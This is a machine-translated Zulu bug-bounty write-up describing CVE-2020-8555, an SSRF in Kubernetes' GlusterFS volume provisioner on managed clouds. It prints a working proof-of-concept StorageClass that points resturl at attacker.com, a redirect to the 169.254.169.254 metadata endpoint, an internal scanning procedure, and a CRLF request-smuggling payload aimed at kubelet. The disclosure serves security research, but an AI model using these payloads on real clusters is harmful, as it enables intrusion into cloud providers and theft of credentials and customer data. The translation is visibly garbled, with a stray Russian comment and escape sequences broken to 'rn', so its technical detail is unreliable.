Qaphela. transl.: ababhali balesi sihloko bakhuluma kabanzi ngokuthi bakwazile kanjani ukuthola ubungozi
Singobani
Singabacwaningi bezokuphepha base-France ababili abathole ngokuhlanganyela ubungozi e-Kubernetes. Amagama ethu singuBrice Augras noChristophe Hauquiert, kodwa kumapulatifomu amaningi e-Bug Bounty saziwa ngokuthi i-Reeverzax ne-Hach ngokulandelana:
-
Brice Augras -Inkampani ye-Groupe Asten ; -
Christophe Hauquiert - Umakhi we-Kubernetes kwaNokia.
Kwenzenjani?
Lesi sihloko siyindlela yethu yokwabelana ngokuthi iphrojekthi yocwaningo evamile iphenduke kanjani kungazelelwe yaba uhambo olujabulisa kakhulu empilweni yabazingeli bezimbungulu (okungenani okwamanje).
Njengoba wazi, abazingeli bezinambuzane banezici ezimbalwa eziphawulekayo:
- baphila nge-pizza nobhiya;
- bayasebenza uma bonke abanye belele.
Nathi asihlukile kule mithetho: sivamise ukuhlangana ngezimpelasonto futhi sichitha ubusuku bokungalali sigebenga. Kodwa obunye balobu busuku baphela ngendlela engavamile kakhulu.
Ekuqaleni besizohlangana ukuze sixoxe ngokubamba iqhaza
Ngo-11 ebusuku sahlala phansi senza ucwaningo futhi salala ekuseni kakhulu, sigculiseke kakhulu ngemiphumela. Kungenxa yalolu cwaningo ukuthi sahlangana nohlelo lwe-MSRC Bug Bounty futhi saqhamuka nokuxhashazwa kokukhulisa ilungelo.
Kwadlula amasonto/izinyanga ezimbalwa, futhi umphumela wethu obungalindelekile ubangele omunye wemiklomelo ephakeme kakhulu emlandweni we-Azure Cloud Bug Bounty - ngaphezu kwalowo esiwuthole ku-Kubernetes!
Ngokusekelwe kuphrojekthi yethu yocwaningo, iKomidi Lokuphepha Lomkhiqizo we-Kubernetes lishicilelwe
Manje ngingathanda ukusabalalisa ulwazi mayelana nokuba sengozini okutholiwe ngangokunokwenzeka. Sithemba ukuthi uzokujabulela ukuthola futhi wabelane ngemininingwane yobuchwepheshe namanye amalungu omphakathi we-infosec!
Nansi-ke indaba yethu...
Umongo
Ukwenza umqondo omkhulu walokho okwenzekile, ake siqale sibheke ukuthi u-Kubernetes usebenza kanjani endaweni ephethwe ngamafu.
Uma uqinisa iqoqo le-Kubernetes endaweni enjalo, isendlalelo sokuphatha ngokuvamile siwumthwalo womhlinzeki wamafu:
Isendlalelo sokulawula sitholakala kupherimitha yomhlinzeki wamafu, kuyilapho amanodi e-Kubernetes atholakala kumngcele wekhasimende.
Ukwaba amavolumu ngendlela eguquguqukayo, indlela esetshenziswayo isetshenziselwa ukuwahlinzeka ngokuguquguqukayo kusuka kusitoreji sangaphandle esingemuva futhi uwaqhathanise ne-PVC (isimangalo sevolumu esiphikelelayo, okungukuthi isicelo sevolumu).
Ngakho, ngemva kokuba i-PVC idaliwe futhi iboshelwe ku-StorageClass kuqoqo le-K8s, izenzo ezengeziwe zokuhlinzeka ngevolumu zithathwa ngumphathi wesilawuli se-kube/cloud (igama layo eliqondile lincike ekukhululweni). (Qaphela. transl.: Sesibhale okwengeziwe nge-CCM sisebenzisa isibonelo sokuqaliswa kwayo komunye wabahlinzeki bamafu
Kunezinhlobo ezimbalwa zabahlinzeki abasekelwa i-Kubernetes: iningi labo lifakiwe
Ocwaningweni lwethu, sigxile endleleni yokuhlinzeka ngevolumu yangaphakathi, eboniswa ngezansi:
Ukunikezwa okunamandla kwamavolumu kusetshenziswa umnikezeli owakhelwe ngaphakathi we-Kubernetes
Ngamafuphi, uma i-Kubernetes isetshenziswa endaweni ephethwe, umphathi wesilawuli unesibopho somhlinzeki wamafu, kodwa isicelo sokudala ivolumu (inombolo 3 kumdwebo ongenhla) sishiya inethiwekhi yangaphakathi yomhlinzeki wamafu. Futhi kulapho izinto ziba mnandi kakhulu!
Isimo sokugebenga
Kulesi sigaba, sizochaza ukuthi sisebenzise kanjani ithuba lokuhamba komsebenzi okukhulunywe ngenhla futhi safinyelela izinsiza zangaphakathi zomhlinzeki wesevisi yamafu. Izophinde ikubonise ukuthi ungenza kanjani izenzo ezithile, njengokuthola imininingwane yangaphakathi noma amalungelo akhulayo.
Ukukhohlisa okukodwa okulula (kulokhu, i-Service Side Request Forgery) kwasiza ukweqa imvelo yeklayenti kwaba yiqoqo labahlinzeki besevisi abahlukahlukene ngaphansi kwama-K8 aphethwe.
Ocwaningweni lwethu sigxile kumhlinzeki we-GlusterFS. Ngaphandle kweqiniso lokuthi ukulandelana okuqhubekayo kwezenzo kuchazwe kulo mongo, i-Quobyte, StorageOS kanye ne-ScaleIO zisengozini yokuba sengozini efanayo.
Ukusetshenziswa kabi kwendlela yokunikeza umthamo oguqukayo
Phakathi nokuhlaziywa kwekilasi lesitoreji I-GlusterFS kukhodi yomthombo weklayenti le-Golang thina resturl
kungezwe /volumes
.
Sinqume ukususa le ndlela eyengeziwe ngokungeza #
kupharamitha resturl
. Nakhu ukulungiselelwa kokuqala kwe-YAML esakusebenzisa ukuhlola ukuba sengozini kwe-SSRF engaboni kahle. (ungafunda kabanzi mayelana ne-semi-blind noma i-half-blind SSRF, isibonelo,
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
name: poc-ssrf
provisioner: kubernetes.io/glusterfs
parameters:
resturl: "http://attacker.com:6666/#"
---
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
name: poc-ssrf
spec:
accessModes:
- ReadWriteOnce
volumeMode: Filesystem
resources:
requests:
storage: 8Gi
storageClassName: poc-ssrf
Sabe sesisebenzisa kanambambili ukuphatha ukude iqoqo le-Kubernetes kubctl. Imvamisa, abahlinzeki bamafu (i-Azure, Google, AWS, njll.) bakuvumela ukuthi uthole imininingwane ozoyisebenzisa kulolu hlelo lokusebenza.
Ngenxa yalokhu, ngikwazile ukusebenzisa ifayela lami “elikhethekile”. I-Kube-controller-manager isebenzise isicelo se-HTTP esiwumphumela:
kubectl create -f sc-poc.yaml
Impendulo ngokombono womhlaseli
Ngokushesha ngemva kwalokhu, sakwazi nokuthola impendulo ye-HTTP kuseva eqondiwe - ngemiyalo describe pvc
noma get events
kwe kubectl. Futhi ngempela: lo mshayeli we-Kubernetes ozenzakalelayo ukhuluma kakhulu ezixwayisweni zakhe/emilayezweni yephutha...
Nasi isibonelo esinesixhumanisi esiya kuso https://www.google.fr
setha njengepharamitha resturl
:
kubectl describe pvc poc-ssrf
# или же можете воспользоваться kubectl get events
Ngale ndlela, besikhawulelwe emibuzweni efana nale I-HTTP POST futhi ayikwazanga ukuthola okuqukethwe kwendikimba yempendulo uma ikhodi yokubuyisela ibikhona 201. Ngakho-ke, sinqume ukwenza ucwaningo olwengeziwe futhi sandise lesi simo sokugebenga ngezindlela ezintsha.
Ukuvela kocwaningo lwethu
- Isimo Esithuthukisiwe #1: Ukusebenzisa ukuqondisa kabusha okungu-302 kusuka kuseva yangaphandle ukuze uguqule indlela ye-HTTP ukuze unikeze indlela evumelana nezimo kakhulu yokuqoqa idatha yangaphakathi.
- Isimo Esithuthukisiwe #2: Yenza ukuskena kwe-LAN ngokuzenzakalelayo nokutholwa kwensiza yangaphakathi.
- Isimo esithuthukisiwe #3: ukusebenzisa i-HTTP CRLF + ukushushumbisa (“isicelo sokushushumbisa”) ukuze udale izicelo ze-HTTP ezenzelwe wena futhi ubuyisele idatha ekhishwe kulogi lwesilawuli se-kube-control.
Imininingwane Yezobuchwepheshe
- Ucwaningo lusebenzise Isevisi ye-Azure Kubernetes (AKS) enenguqulo ye-Kubernetes 1.12 esifundeni saseNyakatho Yurophu.
- Izimo ezichazwe ngenhla zenziwa ekukhishweni kwakamuva kwe-Kubernetes, ngaphandle kwesimo sesithathu, ngoba ubedinga i-Kubernetes eyakhiwe ngenguqulo ye-Golang ≤ 1.12.
- Iseva yangaphandle yomhlaseli -
https://attacker.com
.
Isimo Esithuthukisiwe #1: Iqondisa kabusha isicelo se-HTTP POST ukuze THOLA nokwamukela idatha ebucayi
Indlela yoqobo ithuthukiswe ukulungiselelwa kweseva yomhlaseli ukuthi ibuye 302 HTTP Ikhodi kabushaukuguqula isicelo se-POST sibe isicelo se-GET (isinyathelo sesi-4 kumdwebo):
Isicelo sokuqala (3) esivela kuklayenti I-GlusterFS (Umphathi Wokulawula), unohlobo LOKUTHUMELA. Ngokulandela lezi zinyathelo sikwazile ukuwenza i-GET:
- Njengepharamitha
resturl
ku-StorageClass kubonisiwehttp://attacker.com/redirect.php
. - Isiphetho
https://attacker.com/redirect.php
iphendula ngekhodi yesimo ye-HTTP engu-302 enasihloko sendawo esilandelayo:http://169.254.169.254
. Lokhu kungaba noma iyiphi enye insiza yangaphakathi - kulokhu, isixhumanisi sokuqondisa kabusha sisetshenziswa kuphela njengesibonelo. - Ngokuzenzakalelayo umtapo wezincwadi we-net/http U-Golang uqondisa kabusha isicelo futhi uguqule i-POST ibe yi-GET enekhodi yesimo engu-302, okuholela esicelweni se-HTTP GET esisetshenziswa okuqondiwe kuso.
Ukuze ufunde indikimba yempendulo ye-HTTP okudingeka uyenze describe
Into ye-PVC:
kubectl describe pvc xxx
Nasi isibonelo sempendulo ye-HTTP ngefomethi ye-JSON esikwazile ukuyithola:
Amandla okuba sengcupheni okutholakele ngaleso sikhathi ayenomkhawulo ngenxa yamaphuzu alandelayo:
- Ukungakwazi ukufaka izihloko ze-HTTP esicelweni esiphumayo.
- Ukungakwazi ukwenza isicelo se-THUMELA ngamapharamitha emzimbeni (lokhu kulula ukucela inani elingukhiye kusibonelo njll. 2379 port uma kusetshenziswa i-HTTP engabetheliwe).
- Ukungakwazi ukubuyisa okuqukethwe kwendikimba yempendulo lapho ikhodi yesimo ingu-200 futhi impendulo ingenayo i-JSON Content-Type.
Isimo esithuthukisiwe #2: Iskena inethiwekhi yendawo
Le ndlela ye-SSRF engaboni kahle yabe isisetshenziswa ukuskena inethiwekhi yangaphakathi yomhlinzeki wamafu futhi kwenziwe inhlolovo ngamasevisi ahlukahlukene okulalela (isibonelo semethadatha, i-Kubelet, njll.) ngokusekelwe ezimpendulweni. kube isilawuli.
Okokuqala, izimbobo zokulalela ezijwayelekile zezingxenye ze-Kubernetes zanqunywa (8443, 10250, 10251, njll.), kwase kufanele senze inqubo yokuskena ngokuzenzakalelayo.
Ngokubona ukuthi le ndlela yokuskena izinsiza icace kakhulu futhi ayihambelani nezikena zakudala namathuluzi e-SSRF, sinqume ukudala abasebenzi bethu ngombhalo we-bash owenza yonke inqubo ngokuzenzakalelayo.
Isibonelo, ukuze uskene ngokushesha ububanzi 172.16.0.0/12 wenethiwekhi yangaphakathi, abasebenzi abangu-15 baqaliswe ngokuhambisana. Ibanga le-IP elingenhla likhethiwe njengesibonelo kuphela futhi lingase libe ngaphansi koshintsho ebangeni le-IP lomhlinzeki wakho wesevisi othize.
Ukuskena ikheli le-IP elilodwa kanye nembobo eyodwa, udinga ukwenza lokhu okulandelayo:
- susa i-StorageClass yokugcina ehloliwe;
- susa Isimangalo Sevolumu Eqhubekayo esiqinisekisiwe sangaphambilini;
- shintsha amanani we-IP ne-Port ku
sc.yaml
; - dala i-StorageClass nge-IP entsha kanye nechweba;
- dala i-PVC entsha;
- khipha imiphumela yokuskena usebenzisa ukuchaza kwe-PVC.
Isimo esithuthukisiwe #3: umjovo we-CRLF + ukushushumbisa i-HTTP ezinguqulweni “ezindala” zeqoqo le-Kubernetes
Uma ngaphezu kwalokhu umhlinzeki unikeze amakhasimende izinguqulo ezindala zeqoqo le-K8s и ibanike ukufinyelela kulogi ye-kube-controller-manager, umphumela waba obaluleke kakhulu.
Ngempela kulula kakhulu ukuthi umhlaseli aguqule izicelo ze-HTTP eziklanyelwe ukuthola impendulo ephelele ye-HTTP ngokubona kwakhe.
Ukuze kusetshenziswe isimo sokugcina, lezi zimo ezilandelayo bekufanele kuhlangatshezwane nazo:
- Umsebenzisi kufanele abe nokufinyelela kulogi ye-kube-controller-manager (njengesibonelo, ku-Azure LogInsights).
- Iqoqo le-Kubernetes kufanele lisebenzise inguqulo ye-Golang engaphansi kuka-1.12.
Sikhiphe indawo yendawo elingisa ukuxhumana phakathi kweklayenti le-GlusterFS Go kanye neseva eqondiwe mbumbulu (sizokuyeka ukushicilela i-PoC okwamanje).
Itholakele
Ngokuhlanganisa i-SSRF engaboni kahle echazwe ngenhla ndawonye ngalokhu, sikwazile ukuthumela izicelo ngokuthanda kwethu, okuhlanganisa ukufaka esikhundleni sezihloko, indlela ye-HTTP, amapharamitha kanye nedatha, okube-controller-manager bese icutshungulwa.
Nasi isibonelo "sokudla" okusebenzayo kupharamitha resturl
I-StorageClass, esebenzisa isimo sokuhlasela esifanayo:
http://172.31.X.1:10255/healthz? HTTP/1.1rnConnection: keep-
alivernHost: 172.31.X.1:10255rnContent-Length: 1rnrn1rnGET /pods? HTTP/1.1rnHost: 172.31.X.1:10255rnrn
Umphumela uyiphutha impendulo engaceliwe, umlayezo orekhodwe ngawo kulogi lwesilawuli. Ngenxa ye-verbosity enikwe amandla ngokuzenzakalela, okuqukethwe komlayezo wokuphendula we-HTTP nakho kugcinwa lapho.
Lokhu bekuyi-"bait" yethu ephumelela kakhulu ngaphakathi kohlaka lobufakazi bomqondo.
Sisebenzisa le ndlela, sikwazile ukwenza okunye ukuhlasela okulandelayo kumaqoqo abahlinzeki abahlukahlukene be-k8s abaphethwe: ukukhushulwa kwamalungelo ngemininingwane yezenzakalo zemethadatha, I-Master DoS ngezicelo (ezingabetheliwe) ze-HTTP ezimweni eziyinhloko njll.
Imiphumela
Esitatimendeni esisemthethweni se-Kubernetes mayelana nokuba sengozini kwe-SSRF esikutholile, kukalwa I-CVSS 6.3/10: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N. Uma sicabangela kuphela ukuba sengozini okuhlobene nepherimitha ye-Kubernetes, i-vector yobuqotho (i-vector yobuqotho) ifaneleka njenge None.
Kodwa-ke, ukuhlola imiphumela engaba khona kumongo wendawo yesevisi ephethwe (futhi lena bekuyingxenye ethakazelisa kakhulu yocwaningo lwethu!) kusishukumisele ukuthi sihlukanise kabusha ubungozi sibe isilinganiso. I-CVSS10/10 ebucayi kubasabalalisi abaningi.
Ngezansi kukhona ulwazi olwengeziwe lokukusiza uqonde ukucabanga kwethu lapho uhlola imithelela engaba khona ezindaweni zamafu:
Ubuqotho
- Sebenzisa imiyalo ukude usebenzisa ukuqinisekisa kwangaphakathi okutholiwe.
- Ukukhiqiza kabusha lesi simo esingenhla kusetshenziswa indlela ye-IDOR (Insecure Direct Object Reference) nezinye izinsiza ezitholakala kunethiwekhi yendawo.
Ukugcinwa kuyimfihlo
- Uhlobo lokuhlasela
Ukuhamba Kwesikhashana sibonga ukwebiwa kwemininingwane yefu (isibonelo, imethadatha API). - Iqoqa imininingwane ngokuskena inethiwekhi yendawo (inquma inguqulo ye-SSH, inguqulo yeseva ye-HTTP, ...).
- Qoqa izibonelo nolwazi lwengqalasizinda ngokuvotela ama-API angaphakathi njenge-metadata API (
http://169.254.169.254
, ...). - Ukweba idatha yekhasimende kusetshenziswa izifakazelo zamafu.
Ukutholakala
Zonke izimo zokuxhaphaza ezihlobene nama-vectors ahlaselayo ubuqotho, ingasetshenziselwa izenzo ezilimazayo futhi iholele ekutheni izimo ezivela kupherimitha yeklayenti (noma enye yazo) zingatholakali.
Njengoba besisendaweni ye-K8s ephethwe futhi sihlola umthelela wobuqotho, singacabanga ngezimo eziningi ezingaba nomthelela ekutholakaleni. Izibonelo ezengeziwe zifaka ukonakalisa isizindalwazi se- etcd noma ukwenza ikholi ebucayi eya ku-Kubernetes API.
Ukulandelana kwezikhathi
- Disemba 6, 2019: Ukuba sengozini kubikwe ku-MSRC Bug Bounty.
- Januwari 3, 2020: Inkampani yangaphandle yazise onjiniyela be-Kubernetes ukuthi sisebenza ngodaba lwezokuphepha. Futhi wabacela ukuthi bacabangele i-SSRF njengendawo yangaphakathi (in-core) sengozini. Sibe sesinikeza umbiko ojwayelekile onemininingwane yobuchwepheshe mayelana nomthombo wenkinga.
- Januwari 15, 2020: Sinikeze imibiko yobuchwepheshe nejwayelekile kubathuthukisi be-Kubernetes ngesicelo sabo (ngenkundla ye-HackerOne).
- NgoJanuwari 15, 2020: Abathuthukisi be-Kubernetes basazise ukuthi umjovo we-SSRF + CRLF oyimpumputhe wokukhishwa kwangaphambilini uthathwa njengosengozini engaphakathi. Ngokushesha sayeka ukuhlaziya amapherimitha abanye abahlinzeki bezinsizakalo: ithimba le-K8s manje lase libhekene nomsuka.
- Januwari 15, 2020: Umklomelo we-MSRC utholwe nge-HackerOne.
- Januwari 16, 2020: I-Kubernetes PSC (Ikomiti Lezokuphepha Komkhiqizo) yabona ubungozi futhi yacela ukuthi kugcinwe kuyimfihlo kuze kube maphakathi no-March ngenxa yenani elikhulu labangase babe izisulu.
- Februwari 11, 2020: Umklomelo we-Google VRP wamukelwe.
- Mashi 4, 2020: Umklomelo we-Kubernetes utholwe nge-HackerOne.
- Mashi 15, 2020: Ukudalulwa komphakathi okwakuhlelelwe ekuqaleni kuhlehlisiwe ngenxa yesimo se-COVID-19.
- Juni 1, 2020: Isitatimende esihlanganyelwe se-Kubernetes + Microsoft mayelana nokuba sengozini.
TL; DR
- Siphuza ubhiya futhi sidla i-pizza :)
- Sithole ubungozi obungaphakathi ku-Kubernetes, nakuba besingenanhloso yokwenza kanjalo.
- Senze ukuhlaziya okwengeziwe kumaqoqo abahlinzeki befu abahlukene futhi sakwazi ukukhulisa umonakalo odalwe ukuba sengozini yokuthola amabhonasi amangalisayo.
- Uzothola imininingwane eminingi yobuchwepheshe kulesi sihloko. Singajabula ukuxoxa ngazo nawe (Twitter:
@ReeverZax &@__hach_ ). - Kuvele ukuthi zonke izinhlobo zezinqubo nokubika kuthathe isikhathi eside kunalokho obekulindelwe.
izithenjwa
-
Iqembu le-Google kubernetes-security-adnounce ; -
I-CVE-2020-8555 ; -
Isiqephu esedlule #30794 ; -
heketi/client/api/go-client/volume.go .
I-PS evela kumhumushi
Funda futhi kubhulogi yethu:
- «
Ukuzingela kwe-Kubernetes bug kuvuliwe ngokusemthethweni "; - «
Ukudlula i-pod e-Kubernetes ngokufaka izingodo "; - «
33+ amathuluzi okuphepha e-Kubernetes ".
Source: www.habr.com